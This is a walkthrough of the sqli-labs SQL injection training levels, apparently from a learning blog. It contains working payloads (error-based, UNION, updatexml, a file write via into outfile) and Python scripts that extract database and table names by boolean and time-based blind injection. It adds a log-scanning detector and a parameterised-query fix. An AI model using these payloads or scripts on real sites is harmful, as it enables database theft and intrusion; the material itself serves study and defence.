Less-1 GET - Error based - Single quotes - String
(Error-based GET single-quote string injection)
From the error message, this is inferred to be a string-type injection.
order by 3 returns normally and order by 4 errors, so the column count is 3.
group_concat can be used to print all values of a column on one line.
Less-2 GET - Error based - Intiger based
(Error-based GET integer injection)
%2b is the URL encoding of +.
Entering 1+1 returns the same result as entering 2,
so this is judged to be a numeric injection.
The payload is similar to Less-1; just remove the quotes.
Less-3 GET - Error based - Single quotes with twist string
(Error-based GET single-quote twisted string injection)
Entering 1' produces an error; the error message shows the input wrapped in single quotes inside parentheses.
The statement is inferred to be select ... from ... where id=('1')
The payload is similar to Less-1; just add a closing parenthesis.
Less-4 GET - Error based - Double Quotes - String
(Error-based GET double-quote string injection)
A single quote does not change the output, but a double quote produces an error.
From the error message the statement is inferred to be select ... from ... where id=("")
Replace the trailing single quote of the Less-1 payload with a double quote followed by ).
Less-5 GET - Double Injection - Single Quotes - String
(Double-injection GET single-quote string injection)
Entering 1' produces an error,
but the page always shows You are in...
Boolean-based blind, time-based blind or error-based injection can all be used.
Here boolean-based blind injection is used to brute-force the database name as an example.
Brute-force the database name length
(requests and url are defined in the full script further down)
def getdb_num():
    # The page contains "You are in" only when the injected condition is true.
    for i in range(1, 20):
        payload = f"' and length(database())={i} --+"
        html = requests.get(url + payload).text
        if 'You are in' in html:
            print(f"[+]数据库长度:{i}")
            return i
Brute-force the database name
def getdb_name():
    # Recover each character by binary search over its ASCII value: the oracle
    # answers "is the character > mid?", narrowing [lo, hi] until hi is the code point.
    db_name = ''
    for i in range(1, db_num + 1):
        hi = ord('z')
        lo = ord('A')
        while abs(hi - lo) > 1:
            mid = (hi + lo) // 2
            payload = f"' and ascii(substr(database(),{i},1))>{mid} --+"
            html = requests.get(url + payload).text
            if 'You are in' in html:
                lo = mid
            else:
                hi = mid
        db_name += chr(hi)
    print(f"[+]数据库名:{db_name}")
    return db_name
Full code
import requests

def getdb_num():
    # Probe the length of the current database name; the page contains
    # "You are in" only when the injected condition is true.
    for i in range(1, 20):
        payload = f"' and length(database())={i} --+"
        html = requests.get(url + payload).text
        if 'You are in' in html:
            print(f"[+]数据库长度:{i}")
            return i

def getdb_name():
    # Recover each character by binary search over its ASCII value: the oracle
    # answers "is the character > mid?", narrowing [lo, hi] until hi is the code point.
    db_name = ''
    for i in range(1, db_num + 1):
        hi = ord('z')
        lo = ord('A')
        while abs(hi - lo) > 1:
            mid = (hi + lo) // 2
            payload = f"' and ascii(substr(database(),{i},1))>{mid} --+"
            html = requests.get(url + payload).text
            if 'You are in' in html:
                lo = mid
            else:
                hi = mid
        db_name += chr(hi)
    print(f"[+]数据库名:{db_name}")
    return db_name

if __name__ == "__main__":
    url = 'http://127.0.0.1/Less-5/?id=1'
    db_num = getdb_num()
    db_name = getdb_name()
By reading other people's blogs I learned that double-query injection can also be used.
Double-query injection
hid=-1' union select count(*),1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e,floor(rand(0)*2)) as a from information_schema.tables group by a --+
Less-6 GET - Double Injection - Double Quotes - String
(Double-injection GET double-quote string injection)
Replace the single quote from the previous level with a double quote.
Less-7 GET - Dump into outfile - String
(Dump-into-outfile GET string injection)
Through testing, the original statement is found to be select * from users where id=(('id'))
so ')) is used to close it.
The level hints at dump into outfile,
so writing a file is used here.
id=1')) union select 1,2,'helloword' into outfile "D:\\phpstudy_pro\\WWW\\test.txt" --+
Less-8 GET - Blind - Boolian Based - Single Quotes
(Boolean-based GET single-quote blind injection)
Either boolean-based or time-based blind injection works; the approach is similar to Less-5.
The only difference is that error-based injection cannot be used.
Less-9 GET - Blind - Time based. - Single Quotes
(Time-based GET single-quote blind injection)
No matter what is entered
Below is the Python script that extracts the database name.
import requests
import time

url = 'http://127.0.0.1/Less-9/?id=1'
database = ''
for i in range(1, 9):
    hi = ord('z')
    lo = ord('a')
    # Binary search on the ASCII value of the i-th character; the condition
    # is true when the response is delayed by sleep(2).
    while abs(hi - lo) > 1:
        mid = (hi + lo) // 2
        payload = f"' and if(ascii(substr(database(),{i},1))>{mid},sleep(2),1) --+"
        stime = time.time()
        requests.get(url + payload)
        etime = time.time()
        if etime - stime > 1:
            lo = mid
        else:
            hi = mid
    database += chr(hi)
print(database)
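The probes sent by the Less-5 and Less-9 scripts above leave a recognisable shape in web-server logs. As an added example that is not part of the original writeup, the following Python scans constructed Apache-style access-log lines for those shapes; the log lines and the signature names are assumptions of this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache-style, not from the page): a baseline
# request, three probes shaped like the Less-5/Less-9 payloads, and a normal request.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /Less-5/?id=1 HTTP/1.1" 200 720
127.0.0.1 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-5/?id=1'%20and%20length(database())=8%20--+ HTTP/1.1" 200 720
127.0.0.1 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-5/?id=1'%20and%20ascii(substr(database(),1,1))>109%20--+ HTTP/1.1" 200 720
127.0.0.1 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-9/?id=1'%20and%20if(ascii(substr(database(),1,1))>109,sleep(2),1)%20--+ HTTP/1.1" 200 720
127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-1/?id=2 HTTP/1.1" 200 715
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Signatures for the probe shapes above, evaluated on the URL-decoded path
# (unquote_plus turns the "--+" tail into "-- ", the MySQL line-comment form).
SIGNATURES = {
    "length_probe":  re.compile(r"\blength\s*\(\s*database\s*\(\s*\)\s*\)\s*=", re.I),
    "boolean_blind": re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I),
    "time_blind":    re.compile(r"\bsleep\s*\(\s*\d", re.I),
    "comment_tail":  re.compile(r"--\s*$"),
}

def classify_path(path):
    # Sorted names of every signature that matches the decoded request path.
    decoded = unquote_plus(path)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))

def scan_log(text):
    # One finding per parseable request that matched at least one signature.
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than abort the scan
        tags = classify_path(m.group("path"))
        if tags:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "path": unquote_plus(m.group("path")), "tags": tags})
    return findings

def probes_per_ip(findings):
    # Blind injection shows up as a burst of near-identical probes from one source.
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts
```

A character-by-character blind extraction needs dozens of requests per character, so the per-IP count is the signal worth alerting on, not any single matched line.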
Less-11 POST - Error Based - Single quotes- String
(Error-based POST single-quote string injection)
A simple POST injection.
Less-12 POST - Error Based - Double quotes- String-with twist
(Error-based POST double-quote twisted string injection)
Entering admin" produces an error message,
so the query statement should be SELECT username, password FROM users WHERE username=(passwd) LIMIT 0,1
Same idea as the previous level; replace the single quote with ").
Less-13 POST - Double Injection - Single quotes- String -twist
(POST single-quote twisted double injection)
Entering admin' in the username field produces an error,
so ') is needed to close it.
The input is not echoed, so boolean-based blind injection comes to mind.
When login succeeds, flag.jpg appears on the page.
Below is the script that extracts the database name.
import requests

url = 'http://127.0.0.1/Less-13/'
database = ''
for i in range(1, 9):
    hi = ord('z')
    lo = ord('A')
    # Binary search on the ASCII value of the i-th character; a successful
    # login (flag.jpg in the response) means the injected comparison was true.
    while abs(hi - lo) > 1:
        mid = (hi + lo) // 2
        payload = f"admin ') and ascii(substr(database(),{i},1))>{mid} #"
        data = {
            'uname': payload,
            'passwd': "123"
        }
        html = requests.post(url=url, data=data).text
        if "flag.jpg" in html:
            lo = mid
        else:
            hi = mid
    database += chr(hi)
print(database)
Extract the third table (the users table):
import requests

url = 'http://127.0.0.1/Less-13/'
table = ''
for i in range(1, 6):
    hi = ord('z')
    lo = ord('A')
    # Same binary search as above, but over the table name selected
    # from information_schema.tables instead of database().
    while abs(hi - lo) > 1:
        mid = (hi + lo) // 2
        payload = f"admin ') and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),{i},1))>{mid} #"
        data = {
            'uname': payload,
            'passwd': "123"
        }
        html = requests.post(url=url, data=data).text
        if "flag.jpg" in html:
            lo = mid
        else:
            hi = mid
    table += chr(hi)
print(table)
Less-14 POST - Double Injection - Single quotes- String -twist
(POST single-quote twisted double injection)
Entering admin" produces an error,
so " is used to close it.
Same idea as the previous level; either boolean-based blind or error-based injection can be used.
Here error-based injection is used.
1. concat aggregate-function error-based injection
payload:
uname=123" union select count(*),concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema =database()),0x7e,floor(rand(0)*2)) as a from information_schema.tables group by a#&passwd=123
2. extractvalue error-based injection
payload:
uname=123" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) #&passwd=123
3. updatexml error-based injection
payload:
uname=123" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #&passwd=123
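On the defence side, every level above works because the user input is concatenated into the query text, e.g. the WHERE id=('1') shape inferred in Less-3 and the ') login shape of Less-13. As an added example that is not part of the writeup, the following Python uses an in-memory SQLite table as a stand-in for the lab's users table (constructed data) and puts that concatenation beside a parameterised query, with a regression check that tells whether a true and a false tail still change the result, which is exactly what boolean-based blind injection relies on.

```python
import sqlite3

# Constructed in-memory stand-in for the lab's users table (not the lab's data).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    return conn

def lookup_vulnerable(conn, user_id):
    # String concatenation, the shape the writeup infers: ... WHERE id=('1') LIMIT 0,1
    # Whatever follows the closing ') in the input becomes SQL syntax.
    sql = f"SELECT username, password FROM users WHERE id=('{user_id}') LIMIT 0,1"
    return conn.execute(sql).fetchone()

def lookup_safe(conn, user_id):
    # Same query with a bound parameter: the value is compared as data and can
    # never close the quote or append conditions, so the oracle disappears.
    sql = "SELECT username, password FROM users WHERE id=(?) LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchone()

# Two tails that differ only in a condition that is true vs. false, the same
# shape as the ') and ... comparisons used against Less-13 (SQLite uses -- comments).
TRUE_PROBE = "1') and length('abc')=3 -- "
FALSE_PROBE = "1') and length('abc')=4 -- "

def has_blind_oracle(lookup):
    # Defender's regression check: if a true and a false tail give different
    # results, input reaches the engine as syntax and blind inference is possible.
    conn = make_db()
    return lookup(conn, TRUE_PROBE) != lookup(conn, FALSE_PROBE)
```

The same check can be run against any lookup function in a code base; a parameterised query returns no row for both probes because no id equals the literal string.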